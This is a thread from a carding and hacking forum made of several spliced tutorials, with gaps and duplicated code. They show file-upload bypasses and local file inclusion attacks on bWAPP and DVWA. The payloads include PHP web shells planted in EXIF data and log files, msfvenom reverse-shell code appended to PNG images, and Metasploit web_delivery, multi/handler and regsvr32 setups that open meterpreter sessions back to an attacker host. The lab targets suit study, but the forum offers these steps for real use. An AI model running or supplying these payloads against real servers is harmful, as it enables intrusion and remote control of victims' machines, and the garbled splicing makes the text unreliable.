+- Blackhat Carding Forum | Carding Forum - Credit Cards - Hacking Forum - Cracking Forum | Bhcforums.cc (https://bhcforums.cc)
+-- Forum: Carding Zone (https://bhcforums.cc/Forum-Carding-Zone)
+--- Forum: Carders Home (https://bhcforums.cc/Forum-Carders-Home)
+--- Thread: [Guide] How to File Upload Exploitation in bWAPP (Bypass All Security) (/Thread-Guide-How-to-File-Upload-Exploitation-in-bWAPP-Bypass-All-Security)
[Guide] How to File Upload Exploitation in bWAPP (Bypass All Security) - NINZA - 04-26-2020
In this article, you will learn how to bypass all three security level of unrestricted file upload inside the bWAPP and if you want to know more about the various kind of file uploading vulnerability read the previous article that may help you to understand this article more clearly.
Low Security
Open the target IP in the browser: 192.168.0.106/bWAPP/login.php. Enter user and password as bee and bug respectively.
Set security level low, from the list box, chooses your bug select Unrestricted File Upload now and click on the hack.
![[Image: 1.png?w=687&ssl=1]](https://i2.wp.com/3.bp.blogspot.com/-j5Qjmwdhg8E/WKXeOXl240I/AAAAAAAAPUc/c78_2-D0XtAUc7RDbew_HUM7gBpk0EnfACLcB/s1600/1.png?w=687&ssl=1)
Create PHP backdoor using msfvenom and start multi handler in the background; now from the screenshot, you can see I have browse meter.php for uploading as an image inside the web server.
![[Image: 2.png?w=687&ssl=1]](https://i0.wp.com/3.bp.blogspot.com/-KFTOKS_Z5Uc/WKXePu9tUZI/AAAAAAAAPU8/mV3TihQznB0aRIzwtL88Wi2x_aZrcTSBQCLcB/s1600/2.png?w=687&ssl=1)
When the image gets successfully uploaded on the web server it will send the link of the directory where the image is saved to view the uploaded image. Since we haven’t uploaded any real image, therefore, we will try to execute our PHP backdoor by making click on the link “here”.
![[Image: 3.png?w=687&ssl=1]](https://i2.wp.com/3.bp.blogspot.com/-YPTsrTvDSts/WKXePqCbxwI/AAAAAAAAPU4/ffWq8hgpGXwXxY_9ppwxqN4w5gDEKU-aQCLcB/s1600/3.png?w=687&ssl=1)
When the victim clicks the above link “here” we will get the victim’s reverse connection through meterpreter session inside the Metasploit framework.
From the screenshot, you can see Metasploit session 1 is opened.
![[Image: 4.png?w=687&ssl=1]](https://i0.wp.com/1.bp.blogspot.com/-S1O00pFseqg/WKXeQCMYhBI/AAAAAAAAPVA/yRrQO5fhNjY6tnPzv_5uQtYxWwyvaWwEwCLcB/s1600/4.png?w=687&ssl=1)
Medium Security
As the level of security changes so here we cannot able to perform the same procedure as above. Although here you just need to change only the extension of your PHP backdoor to bypass medium security. If you notice the image given below here you will find that I have browse meter.php3 for uploading.
![[Image: 6.png?w=687&ssl=1]](https://i2.wp.com/4.bp.blogspot.com/-7s65aKkWBnw/WKXeQXntqrI/AAAAAAAAPVE/Tm80d2L0hrAB9B3XBccyY1GeIwJw6ceSQCLcB/s1600/6.png?w=687&ssl=1)
Now repeat the same step run multi handler at the background and make click on the given link “here” to receive meterpreter session.
![[Image: 7.png?w=687&ssl=1]](https://i0.wp.com/3.bp.blogspot.com/-ivjKfv2CM9M/WKXeQU55KCI/AAAAAAAAPVI/yLDqUciIx0UmPnnoyD4DxefCgKdnVzm0QCLcB/s1600/7.png?w=687&ssl=1)
Great!!! From the screenshot, you can see Metasploit session 2 is opened.
![[Image: 8.png?w=687&ssl=1]](https://i2.wp.com/4.bp.blogspot.com/-VQ3k1HJYWrI/WKXeQpt-uYI/AAAAAAAAPVM/yi0N0wFZerUe4moSwFnW3n4QKdHKiCkfgCLcB/s1600/8.png?w=687&ssl=1)
High Security
Now we have enter into high security where above two file uploading attack will get failed so here again you need to make some small changes into the extension of PHP backdoor file for uploading it in the web server.
From the screenshot, you can read the file name high.php.png which I have to browse for uploading.
![[Image: 10.png?w=687&ssl=1]](https://i0.wp.com/4.bp.blogspot.com/-3b70PbGkZvo/WKXeOs--VNI/AAAAAAAAPUk/JqxxH9495ukcRRws7yxZi3Z1YTvJ28RuACLcB/s1600/10.png?w=687&ssl=1)
Here our file is successfully uploaded now make right click on the link “here” to copy link location and keep multi handler running at the background.
![[Image: 11.png?w=687&ssl=1]](https://i1.wp.com/1.bp.blogspot.com/-CTIEznGX3AQ/WKXeOqiQZKI/AAAAAAAAPUg/12WJwBujiT44VrdsLmtxo2VEUyi1GQSCACLcB/s1600/11.png?w=687&ssl=1)
To bypass high security of file uploading in bWAPP we need to switch the bug as well as security level.
Set security level low and choose the bug remote & local file Inclusion then click on the hack.
![[Image: 12.png?w=687&ssl=1]](https://i0.wp.com/4.bp.blogspot.com/-6Ob7w-va3Dc/WKXePODR5EI/AAAAAAAAPUo/bovWdLrWcm0-dCB-KWEAxfpjuz5ZNRtUwCLcB/s1600/12.png?w=687&ssl=1)
Here the requested web page which suffering from RFI & LFI Vulnerability gets open. Where you will find a comment to select a language from the given drop down list, and when you click on go button the selected language file get included in URL.
![[Image: 13.png?w=687&ssl=1]](https://i0.wp.com/3.bp.blogspot.com/-JEWCvR5bZmc/WKXePCkx_MI/AAAAAAAAPUw/tZZ2s94GaOkAkttyaXBaduEfMENd_l_pwCLcB/s1600/13.png?w=687&ssl=1)
Since I have uploaded the PHP backdoor shell in high security but execute that backdoor through low security with help of LFI vulnerability. Now just manipulate the following URL as shown in the screenshot.
[To see content please register here]
into 192.168.0.106/bWAPP/rlfi.php?language=images/high.php.png1
[To see content please register here]
into 192.168.0.106/bWAPP/rlfi.php?language=images/high.php.png![[Image: 14.png?w=687&ssl=1]](https://i1.wp.com/4.bp.blogspot.com/-pmitZNccPgU/WKXePHPhlrI/AAAAAAAAPUs/XMVNGKI7ShQAu2QoplLwFTewc-_9oV0RgCLcB/s1600/14.png?w=687&ssl=1)
When the above URL is executed in the browser you will get victim’s reverse connection inside metasploit.
Congrats!!! From the screenshot, you can see metasploit session 3 is opened.
Hence we have bypassed all three security level inside bWAPP
![[Image: 15.png?w=687&ssl=1]](https://i0.wp.com/1.bp.blogspot.com/-_O5673qr6vw/WKXePkNyiSI/AAAAAAAAPU0/v6v0v78QLxMisr7izBXJRCDP3YtIQtc8ACLcB/s1600/15.png?w=687&ssl=1)
The main aim of writing this article is to share the idea of making an attack on a web server using various techniques when the server is suffering from file inclusion vulnerability. As we all are aware of LFI vulnerability which allows the user to include a file through URL in the browser. In this article, I have used two different platform bWAPP and DVWA which contains file inclusion vulnerability and through which I have performed LFI attack in FOUR different ways.
Basic Local file inclusion
Open target IP in the browser and login inside BWAPP as a bee: bug now chooses the bug remote & local file Inclusion then click on the hack.
![[Image: 1.png?w=687]](https://i2.wp.com/3.bp.blogspot.com/-9oSz8F40XmQ/WKSMn6YtSyI/AAAAAAAAPTA/qSe4eguXrpM0ksfgce4tbe5snW4SEdPJACLcB/s1600/1.png?w=687)
Here the requested web page which suffering from RFI & LFI Vulnerability gets open. Where you will find a comment to select a language from the given drop-down list, and when you click on go button the selected language file gets included in URL. To perform basic attacks manipulate
//192.168.1.101/bWAPP/rlfi.php?language=/etc/passwd
1
//192.168.1.101/bWAPP/rlfi.php?language=/etc/passwd
In basic LFI attack we can directly read the content of a file from its directories using (../) or simply (/), now if you will notice the given below screenshot you will find that I have access the password file when the above URL is executed in the browser.
![[Image: 2.png?w=687]](https://i0.wp.com/4.bp.blogspot.com/-sal-J5k6vHA/WKSMpizW3fI/AAAAAAAAPTc/BlaEWIV3fLANmVyRkj1mj_YM5hrd9vhWACLcB/s1600/2.png?w=687)
Null byte
In some scenario, the above basic local file inclusion attack may not work due to the high-security level. From the below image you can observe now that I got to fail to read the password file when executing the same path in URL. So when we face such kind of problem then go for NULL BYTE attack.
Now turn on burp suite to capture the browser request then select the proxy tab and start intercept. Do not forget to set browser proxy while making use of burp suite
![[Image: 3.1.png?w=687]](https://i1.wp.com/2.bp.blogspot.com/-6XQnjcYNF_I/WKSMphNaqAI/AAAAAAAAPTg/rq86B2SkUTE98x2PqHC_wMp3ITmqd5ZvgCLcB/s1600/3.1.png?w=687)
Now inside burp suite send the intercepted data into the repeater.
![[Image: 3.2.png?w=687]](https://i2.wp.com/2.bp.blogspot.com/-ZGvHodLG_ow/WKSMpoo7pPI/AAAAAAAAPTk/2q-xWXEMQ8UVUlwX14624pJbMOq2wpTDACLcB/s1600/3.2.png?w=687)
Inside repeater, you can do an analysis of sent request and response generated by it. From the screenshot, it will be clear that /etc/passwd is not working and I am not able to read the password file.
![[Image: 3.3.png?w=687]](https://i1.wp.com/3.bp.blogspot.com/-pzKWe_xT6Jw/WKSMp_Vm9GI/AAAAAAAAPTo/cF_aRGEW32IHeEFvCaunUO0FeCZJ0HxcwCLcB/s1600/3.3.png?w=687)
From the following screenshot, you can see I had forward the request by adding null character (%00) at the end of directory /etc/passwd%00 and click on go tab. Then on the right sight of the window, the password file gets open as a response.
![[Image: 3.4.png?w=687]](https://i1.wp.com/3.bp.blogspot.com/-B4c9_cdhoIc/WKSMqBg-ktI/AAAAAAAAPTs/vuWrsDbrJZw-DkeJgSUF4pQPIbnsCZ-fQCLcB/s1600/3.4.png?w=687)
Base64 encoded
Now there is another way to exploit LFI when the security level is high and you are unable to view the PHP file content, and then use the following PHP function.
//192.168.1.101/bWAPP/rlfi.php?language= php://filter/read=convert.base64-encode/resource=/etc/passwd
1
//192.168.1.101/bWAPP/rlfi.php?language= php://filter/read=convert.base64-encode/resource=/etc/passwd
Here from the screenshot, you can see the content of password file is encoded into base64; copy the whole encoded text.
![[Image: 3.png?w=687]](https://i1.wp.com/4.bp.blogspot.com/-Fq1j48qAqNM/WKSMqOHWOBI/AAAAAAAAPTw/1-0qm57YolAs5OWDMM2w8f52iDq5gzyuQCLcB/s1600/3.png?w=687)
I am using hackbar which a Firefox plugin to decode above-copied text.
![[Image: 4.png?w=687]](https://i0.wp.com/1.bp.blogspot.com/-3j-1EBwMvto/WKSMqlDnjmI/AAAAAAAAPT4/lEYBwt15U14oHTxpmttAecMywLnM9yeFgCLcB/s1600/4.png?w=687)
Now a pop-up box will get open paste the copied encoded text inside it and click on ok
![[Image: 5.png?w=687]](https://i0.wp.com/1.bp.blogspot.com/-8zQgcdog9GI/WKSMqi3eqOI/AAAAAAAAPT0/_PFd6PQECY4B9ZvWA-0vyvkPk3gULUPYACLcB/s1600/5.png?w=687)
From the given screenshot you can view the result and read the content of password file.
![[Image: 6.png?w=687]](https://i0.wp.com/2.bp.blogspot.com/-5oTmBdvKp_A/WKSMqgtMPxI/AAAAAAAAPT8/bmLS6OTMMXoIkrI-ea0bEWay75VvE2Y2gCLcB/s1600/6.png?w=687)
PHP Input
Using PHP input function we will execute injected PHP code to exploit LFI vulnerability. With the help of hackbar, I am going to perform this task in which first we need to load the URL of the targeted web page as you can see in the given screenshot.
//192.168.1.101/bWAPP/rlfi.php?language=lang_en.php&action=go
1
//192.168.1.101/bWAPP/rlfi.php?language=lang_en.php&action=go
![[Image: 11.png?w=687]](https://i1.wp.com/1.bp.blogspot.com/-1O1WBjK_eW0/WKSMnxK5hcI/AAAAAAAAPS4/NiwlBs4hP6cxUkq-avE5dD9-YrCNR9uggCLcB/s1600/11.png?w=687)
Now manipulate above URL using a PHP input function
//192.168.1.101/bWAPP/rlfi.php?language=php://input&cmd=ls
1
//192.168.1.101/bWAPP/rlfi.php?language=php://input&cmd=ls
Then select the checkbox to enable Post data which will forward the post request and add cmd comment in given text area
<?php system($_GET['cmd']); ?>
1
<?php system($_GET['cmd']); ?>
as shown in the following screenshot, finally click on execute.
This will show directories of victim PC.
![[Image: 12.png?w=687]](https://i0.wp.com/1.bp.blogspot.com/-L_DRx5QSH4Y/WKSMn1y7lrI/AAAAAAAAPS8/Z_K1US8Byk8vyEHk6JLsDF8G_x67g-vLACLcB/s1600/12.png?w=687)
Now time to connect the victim through the reverse connection; an open terminal in Kali Linux and type msfconsole to start Metasploit framework.
msf exploit (web_delivery)>set target 1
msf exploit (web_delivery)> set payload windows/meterpreter/reverse_tcp
msf exploit (web_delivery)> set lhost 192.168.0.104
msf exploit (web_delivery)>set srvport 8081
msf exploit (web_delivery)>exploit
1
2
3
4
5
msf exploit (web_delivery)>set target 1
msf exploit (web_delivery)> set payload windows/meterpreter/reverse_tcp
msf exploit (web_delivery)> set lhost 192.168.0.104
msf exploit (web_delivery)>set srvport 8081
msf exploit (web_delivery)>exploit
Copy the highlighted text shown in below window
![[Image: 13.png?w=687]](https://i1.wp.com/3.bp.blogspot.com/-1_BwBQftnLE/WKSMoSHto-I/AAAAAAAAPTI/9wgWBUYbsxEscrYvy09XF6a_MdUnr65RgCLcB/s1600/13.png?w=687)
Paste above-copied PHP code inside the URL as shown in the image and execute it.
![[Image: 14.png?w=687]](https://i1.wp.com/1.bp.blogspot.com/-bHkObyLYVTI/WKSMoU5_RYI/AAAAAAAAPTE/n7NWUUwe7IAkFbbFVnAK5pJmc593U2VuwCLcB/s1600/14.png?w=687)
When above URL get to execute the attacker got victim’s meterpreter session inside the Metasploit.
msf exploit(web_delivery)>sessions –i 1
meterpreter> sysinfo
1
2
msf exploit(web_delivery)>sessions –i 1
meterpreter> sysinfo
![[Image: 15.png?w=687]](https://i2.wp.com/3.bp.blogspot.com/-FO7soU6fHUE/WKSMoclDTNI/AAAAAAAAPTM/1qvAhABjC-8wHx6Pp32YDbhwYNR8DAsyQCLcB/s1600/15.png?w=687)
Proc/self/environ
If the server is outdated then to exploit it through LFI we can include proc/self/environ file that stores User_Agent where we will place our PHP code for executing CMD command.
//192.168.1.102/dvwa/vulnerabilities/fi/?page=proc/self/environ
1
//192.168.1.102/dvwa/vulnerabilities/fi/?page=proc/self/environ
![[Image: 16.png?w=687]](https://i0.wp.com/3.bp.blogspot.com/-Vzm9uJyIEKU/WKSMo7omSVI/AAAAAAAAPTQ/HE9JBCbj7mwzfQvr1TmssPfZN5K45bNuACLcB/s1600/16.png?w=687)
Now start burp suite and capture the browser request and send the fetch data into the repeater.
![[Image: 17.png?w=687]](https://i0.wp.com/4.bp.blogspot.com/-BcP04t0oKdE/WKSMo18Z50I/AAAAAAAAPTU/LuGOf1Ev8cIgFETTdU07Lil3j3iY-kFGQCLcB/s1600/17.png?w=687)
Add cmd comment <?php system($_GET[‘cmd’]); ?> inside user_Agent and send the request with GET parameter
192.168.1.8/lfi/lfi.php?file=/var/www/apachae2/access.log&cmd=id
1
192.168.1.8/lfi/lfi.php?file=/var/www/apachae2/access.log&cmd=id
as shown in the below image. On the right side of the window, you can see the highlight result as a response.
![[Image: 18.png?w=687]](https://i2.wp.com/1.bp.blogspot.com/-_VXxDi4sdso/WKSMpFuDH2I/AAAAAAAAPTY/Hcx51QzVols10w-B0w7e6Ecz-mwcY8S6wCLcB/s1600/18.png?w=687)
In this article, we are demonstrating how a PHP file with include function can lead to LFI log injection attack in any web server. Please read our previous article “
[To see content please register here]
and “[To see content please register here]
that will help you in the configuration of own web server as well as more about LFI vulnerability.Attacker: Kali Linux
Target: Ubuntu
Create a PHP file which will allow the user to include a file through a file parameter. Hence using file parameter we can execute a file that contains malicious code to make unauthorized access is target PC.
Now I had saved given below PHP code inside a text file as lfi.php and saved on the desktop.
<?php
$file = $_GET['file'];
if(isset($file))
{
include("$file");
}
else
{
include("index.php");
}
?>
1
2
3
4
5
6
7
8
9
10
11
<?php
$file = $_GET['file'];
if(isset($file))
{
include("$file");
}
else
{
include("index.php");
}
?>
![[Image: 1.png?w=687&ssl=1]](https://i2.wp.com/4.bp.blogspot.com/-m9-z9nGzt0A/Wcn18tWpRJI/AAAAAAAARmo/L3ZCm6sX_w0T7FcQD2JxSg13BUEQCWGJgCLcBGAs/s1600/1.png?w=687&ssl=1)
Now login with the user as “root” and create a folder “lfi” inside /var/www/html
cd /var/www/html
mkdir lfi
1
2
cd /var/www/html
mkdir lfi
Move the lfi.php file from desktop to /var/www/html using given below command.
mv /home/raj/Desktop/lfi.php .
1
mv /home/raj/Desktop/lfi.php .
![[Image: 2.png?w=687&ssl=1]](https://i2.wp.com/1.bp.blogspot.com/-HhkYznN91YE/Wcn19Ys-7uI/AAAAAAAARmw/WmR4TlcmAJ0Odxvhb2w026LWUvz0Ut-SgCLcBGAs/s1600/2.png?w=687&ssl=1)
Since we had added a php file with include function inside /var/www/html which allow to read the content of another file through it and can lead to LFI attack. Let’s demonstrate it by exploring the following URL to read password files:
localhost/lfi/lfi.php?file=/etc/passwd
1
localhost/lfi/lfi.php?file=/etc/passwd
From the given image you can observe that the above URL has dumped the following result shown below.
![[Image: 3.png?w=687&ssl=1]](https://i2.wp.com/2.bp.blogspot.com/-OzbTVHelQPw/Wcn19gYCuqI/AAAAAAAARm4/DPJ39M9XG2MKnlqPygfMeBgicfXvokpxwCLcBGAs/s1600/3.png?w=687&ssl=1)
Now I will try to open Apache access.log file through lfi.php on the browser, therefore, give read and write permission to apache2 and then include the access.log file.
chmod 775 -R /var/log/apache2
1
chmod 775 -R /var/log/apache2
![[Image: 4.png?w=687&ssl=1]](https://i0.wp.com/3.bp.blogspot.com/-Ndp2mtyjUiw/Wcn198SoWhI/AAAAAAAARm8/aY7QOBTOuiYJXUHi7-xAiJEf5EpkX2GdQCLcBGAs/s1600/4.png?w=687&ssl=1)
Now to include the acess.log file as file parameter and give following URL inside the browser.
192.168.1.129/lfi/lfi.php?file=/var/log/apache2/access.log
1
192.168.1.129/lfi/lfi.php?file=/var/log/apache2/access.log
From the given image you can see it is showing created apache logs in the browser. Now turn on burp suite to capture the request of the same web page.
![[Image: 5.png?w=687&ssl=1]](https://i1.wp.com/1.bp.blogspot.com/-YizGNJli0WU/Wcn1-DtxcVI/AAAAAAAARnA/nr6_CWpCI4sB9HJceat-IsUXw55gFY6OgCLcBGAs/s1600/5.png?w=687&ssl=1)
Here you will get intercepted data where we need to inject our cmd comment inside user-agent by replacing highlighted data.
![[Image: 6.png?w=687&ssl=1]](https://i0.wp.com/4.bp.blogspot.com/-38AOy8BmWK8/Wcn1-Kig7bI/AAAAAAAARnE/Q_aZsPKIS4QGHQwM2pm2FY0fSQh31R6nQCLcBGAs/s1600/6.png?w=687&ssl=1)
Add cmd comment
<?php system($_GET['c']); ?>
1
<?php system($_GET['c']); ?>
inside user_Agent and send the request with GET parameter as shown in the below image. Then click on forward.
![[Image: 7.png?w=687&ssl=1]](https://i2.wp.com/1.bp.blogspot.com/-E4i3GMCWI-w/Wcn1-jo8iII/AAAAAAAARnI/qCDOSzId9pgmgfdUL0JVJddn254lb9DfQCLcBGAs/s1600/7.png?w=687&ssl=1)
Here it will dump the log data as well as execute comment given through cmd. From the screenshot, you can view both logs as well as process state.
![[Image: 8.png?w=687&ssl=1]](https://i1.wp.com/3.bp.blogspot.com/-JHr-DudufOs/Wcn1-zOQ4TI/AAAAAAAARnQ/xag51Ql4oC0X62KfKdHwu5L0jxTj2dwHgCLcBGAs/s1600/8.png?w=687&ssl=1)
In the same manner, execute ifconfig through cmd to verify network interface or can browse the following URL and view the result from inside the given screenshot.
192.168.1.129/lfi/lfi.php?file=/var/log/apache2/access.log&c=ifconfig
1
192.168.1.129/lfi/lfi.php?file=/var/log/apache2/access.log&c=ifconfig
![[Image: 9.png?w=687&ssl=1]](https://i1.wp.com/1.bp.blogspot.com/-BuKLBBEyOT8/Wcn1-yx6QvI/AAAAAAAARnM/1zx0LjLGmEE8JGTcBxmQ_yp1AJMhKapdACLcBGAs/s1600/9.png?w=687&ssl=1)
If you found such kind of vulnerability in any web application then you can use Metasploit platform to exploit web server.
use exploit/multi/script/web_delivery
msf exploit (web_delivery)>set target 1
msf exploit (web_delivery)> set lhost 192.168.1.123
msf exploit (web_delivery)>set srvport 8081
msf exploit (web_delivery)> set payload php/meterpreter/reverse_tcp
msf exploit (web_delivery)>exploit
1
2
3
4
5
6
use exploit/multi/script/web_delivery
msf exploit (web_delivery)>set target 1
msf exploit (web_delivery)> set lhost 192.168.1.123
msf exploit (web_delivery)>set srvport 8081
msf exploit (web_delivery)> set payload php/meterpreter/reverse_tcp
msf exploit (web_delivery)>exploit
Copy the highlighted text shown in below window
![[Image: 10.png?w=687&ssl=1]](https://i2.wp.com/1.bp.blogspot.com/-3W6bYa1gzZA/Wcn182CPuGI/AAAAAAAARms/oMXHQYvZ8fUk-_2GzQRtxVHNMFoynu61ACLcBGAs/s1600/10.png?w=687&ssl=1)
Paste the above copied malicious code inside URL as shown in the given image and execute it as a command.
![[Image: 11.png?w=687&ssl=1]](https://i0.wp.com/1.bp.blogspot.com/-1Dmh8VWljoY/Wcn18ioH3NI/AAAAAAAARmk/FOG8KvbTtCoWxSiLUOKucLegVqUF9mZmwCLcBGAs/s1600/11.png?w=687&ssl=1)
When the above code gets executed you will get meterpreter session 1.
msf exploit (web_delivery)>sessions 1
meterpreter> sysinfo
1
2
msf exploit (web_delivery)>sessions 1
meterpreter> sysinfo
![[Image: 12.png?w=687&ssl=1]](https://i2.wp.com/4.bp.blogspot.com/-sFe5iGQxxic/Wcn19E0aCQI/AAAAAAAARm0/3V6VsYGDhlIpA_Mt1TSdKnlcGLddZNrMACLcBGAs/s1600/12.png?w=687&ssl=1)
In this article, you will learn how to bypass file uploading vulnerability in high security through FILE INCLUSION vulnerability. As well as how to bypass local file inclusion to get the reverse connection of victim’s Pc.
Attacker: kali Linux
Target: Dvwa
First, you need to download the Exif Pilot tool from
[To see content please register here]
. This is a GUI tool for windows users which allow adding exif data and Meta data inside a JPEG, PNG and GIF images.Now open exif pilot and insert any image to hide malicious comment inside it; from the screenshot, you can see I have chosen a shell.png image and then click on EDIT EXIF/IPTC.
![[Image: 1.png?w=687&ssl=1]](https://i0.wp.com/3.bp.blogspot.com/-6Txa6zx5Yx4/WJ8oiLCQKwI/AAAAAAAAPQY/fJBoXLn_jQIfRZgMlDMkTm5_RP_VCv5-wCLcB/s1600/1.png?w=687&ssl=1)
Further inside comment text field type
<?php system($_GET['c']); ?>
1
<?php system($_GET['c']); ?>
as malicious code and click on ok.
![[Image: 2.png?w=687&ssl=1]](https://i0.wp.com/1.bp.blogspot.com/-d56PIS3DunY/WJ8okJs5EAI/AAAAAAAAPRE/eU672OGdhLoBTn5fN4RlE4ZDR63h9W65gCLcB/s1600/2.png?w=687&ssl=1)
Here the exif data has been edited successfully inside the image. This tool replaces the malicious image from the original image in the same folder and sent the original image into recycle bin.
![[Image: 3.png?w=687&ssl=1]](https://i1.wp.com/2.bp.blogspot.com/-E_z68g_HxUU/WJ8okkXVO3I/AAAAAAAAPRQ/IK9zR6T1VOkifLhCC5BSVKqZE0ltpnApACLcB/s1600/3.png?w=687&ssl=1)
Now explore target IP in browser and login into DVWA with admin: password as a credential. Set security level high.
![[Image: 4.png?w=687&ssl=1]](https://i2.wp.com/3.bp.blogspot.com/-j6wEVUUNcmA/WJ8ok-LUWQI/AAAAAAAAPRU/R-R27AgR1tYDM8M1c88qVyp4OQcht-N9QCLcB/s1600/4.png?w=687&ssl=1)
Choose vulnerability file upload to upload the malicious image in the web server application and now browse your malicious image shell.png then click on upload.
![[Image: 5.png?w=687&ssl=1]](https://i0.wp.com/2.bp.blogspot.com/-wwlLFuvQctE/WJ8olORqr0I/AAAAAAAAPRY/__YH2VVTXccy2lLkzeOx8S4C0qNwOKUiwCLcB/s1600/5.png?w=687&ssl=1)
It will show the path of the uploaded image copy the highlighted path.
![[Image: 6.png?w=687&ssl=1]](https://i0.wp.com/3.bp.blogspot.com/-89jHr-oTVCs/WJ8olNVKPZI/AAAAAAAAPRc/MAwbWR90db4AAN2TQwBgm41Exx3k138dQCLcB/s1600/6.png?w=687&ssl=1)
Now open the copied path in the browser where you will find the uploaded image.
![[Image: 7.png?w=687&ssl=1]](https://i2.wp.com/1.bp.blogspot.com/-9TDZMx3ofsE/WJ8oldMT4LI/AAAAAAAAPRg/SGqJPOL94CMeRXmp9L-EIrPCTFW1WXGIwCLcB/s1600/7.png?w=687&ssl=1)
In order to execute the malicious code, we need to change the category of vulnerability as well as security level also so that we can execute the hidden comment inside the image.
Now set security level low.
In order to bypass file uploading vulnerability in high security of DVWA, we need to set other vulnerability and I have select File Inclusion for this purpose.
File Inclusion allows users to execute any file through URL as I have described above.
![[Image: 9.png?w=687&ssl=1]](https://i2.wp.com/4.bp.blogspot.com/-i3ULM5fcZLU/WJ8olrSwjLI/AAAAAAAAPRo/EVcaPuEfrCw8JnUidt7Zepu_VZ9oNLynACLcB/s1600/9.png?w=687&ssl=1)
Now past the above-copied path of the uploaded image inside the URL as shown in the screenshot.
[To see content please register here]
1
[To see content please register here]
Here it has given warning system (): cannot execute blank command which means we need to add some command for execution hence through URL we will be able to execute any command.
![[Image: 10.png?w=687&ssl=1]](https://i2.wp.com/2.bp.blogspot.com/-ZKTdUy5kRfs/WJ8oiLW6kgI/AAAAAAAAPQc/g9-9UNZk1UkpbGCfsV4MOujLEW6oKHtSQCLcB/s1600/10.png?w=687&ssl=1)
[To see content please register here]
1
[To see content please register here]
Here I try to check network configuration of victim’s Pc and you can see the result of network configuration from the screenshot.
![[Image: 11.png?w=687&ssl=1]](https://i1.wp.com/2.bp.blogspot.com/-L0RyBzPOboE/WJ8oiOfd5eI/AAAAAAAAPQg/C3LZ1AjoTdcVzQquV2G732da9n3AdVKhACLcB/s1600/11.png?w=687&ssl=1)
[To see content please register here]
1
[To see content please register here]
Here you can view the directories which I have got by executing dir command in URL.
![[Image: 12.png?w=687&ssl=1]](https://i2.wp.com/3.bp.blogspot.com/-nDxTF6OM7IU/WJ8oih56PyI/AAAAAAAAPQk/UVqxAk6TknwOQYrrRAi_VPPWBXYndZfMwCLcB/s1600/12.png?w=687&ssl=1)
Now next I will try to achieve meterpreter session using Kali Linux
Type msfconsole and load metasploit framework.
use exploit/windows/misc/regsvr32_applocker_bypass_server
msf exploit(regsvr32_applocker_bypass_server) > set lhost 192.168.1.103
msf exploit(regsvr32_applocker_bypass_server) > set lport 1234
msf exploit(regsvr32_applocker_bypass_server) > exploit
1
2
3
4
use exploit/windows/misc/regsvr32_applocker_bypass_server
msf exploit(regsvr32_applocker_bypass_server) > set lhost 192.168.1.103
msf exploit(regsvr32_applocker_bypass_server) > set lport 1234
msf exploit(regsvr32_applocker_bypass_server) > exploit
Copy the above malicious code and send it to the victim.
![[Image: 13.png?w=687&ssl=1]](https://i0.wp.com/1.bp.blogspot.com/-6QvuhM7zD9M/WJ8oigIFOFI/AAAAAAAAPQs/kcIK8pFxdHopVLuWBgWxFJUWhmAJtiOiQCLcB/s1600/13.png?w=687&ssl=1)
Here paste above .dll malicious code inside the URL and when you will run the code in the browser; the attack will get victim’s meterpreter session on his Kali Linux.
[To see content please register here]
/s /n /u /i:http://192.168.1.103:8080/7vnJTV4ONLKkU19.sct scrobj.dll1
[To see content please register here]
/s /n /u /i:http://192.168.1.103:8080/7vnJTV4ONLKkU19.sct scrobj.dll![[Image: 14.png?w=687&ssl=1]](https://i1.wp.com/2.bp.blogspot.com/-5AGFkhnrxTA/WJ8oioBYRLI/AAAAAAAAPQo/NKilS0D3HiMaSKvK-H3Ncb6gxOQIIQsJwCLcB/s1600/14.png?w=687&ssl=1)
meterpreter sessions 1
meterpreter>sysinfo
1
2
meterpreter sessions 1
meterpreter>sysinfo
![[Image: 15.png?w=687&ssl=1]](https://i2.wp.com/3.bp.blogspot.com/-lveZBa5B-NQ/WJ8ojTJvi_I/AAAAAAAAPQw/Tr_CqtbK9rA33waDtpi_232PR20XbdxHQCLcB/s1600/15.png?w=687&ssl=1)
Second Way
In the second part, we will try to combine a malicious PHP file with an image, further use that malicious image for uploading in the web application server and then bypass that image in the same manner as performed above.
Here first you need to download any .png/.jpg/.gif image and save it on Desktop. Inside Kali Linux, I have downloaded an image and save it with the name “a.png” on the desktop. Now open the terminal and type following command to generate a PHP code inside “a.png” image.
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.1.103 lport=4444 >> /root/Desktop/a.png
1
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.1.103 lport=4444 >> /root/Desktop/a.png
![[Image: 16.png?w=687&ssl=1]](https://i1.wp.com/2.bp.blogspot.com/-JglDt0QiMjs/WJ8ojXwRi7I/AAAAAAAAPQ0/_vJt9irBMZwWqYHz_LKnV5nC4lXMoWGGwCLcB/s1600/16.png?w=687&ssl=1)
Let’s verify whether the image contains the malicious code inside it or not
cat /root/Desktop/a.png
1
cat /root/Desktop/a.png
When you will scroll down the window screen, here you will find that the end part of the image contains PHP code. It means we have successfully created the malicious image which ready to upload inside the web application server.
![[Image: 17.png?w=687&ssl=1]](https://i0.wp.com/1.bp.blogspot.com/-pGQaxgd2EZc/WJ8ojjErlMI/AAAAAAAAPQ4/ogP1QKdNiX4LHsMnb9kHhcKvIIXGCWeewCLcB/s1600/17.png?w=687&ssl=1)
Now repeat the above process to upload the file inside DVWA with security level high. From the given screenshot, you can see my “a.png” image is successfully uploaded inside the web server.
Copy the highlighted path where the image is uploaded.
![[Image: 18.png?w=687&ssl=1]](https://i0.wp.com/1.bp.blogspot.com/-oRKufAGz4qg/WJ8oj-XOdDI/AAAAAAAAPQ8/knabO8xoKoMjT_fZ1KEksOvYSMNMV83xACLcB/s1600/18.png?w=687&ssl=1)
Before executing image in web server start multi/handler in background inside the Kali Linux
msf > use multi/handler
msf exploit(handler) > set payload php/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 192.168.1.103
msf exploit(handler) > set lport 4444
msf exploit(handler) >exploit
1
2
3
4
5
msf > use multi/handler
msf exploit(handler) > set payload php/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 192.168.1.103
msf exploit(handler) > set lport 4444
msf exploit(handler) >exploit
![[Image: 19.png?w=687&ssl=1]](https://i2.wp.com/3.bp.blogspot.com/-lM0kgxOqT98/WJ8ojwXTDoI/AAAAAAAAPRA/tQ_Yjx90EZ0kSrouA7vysD0Vdy00W8pFgCLcB/s1600/19.png?w=687&ssl=1)
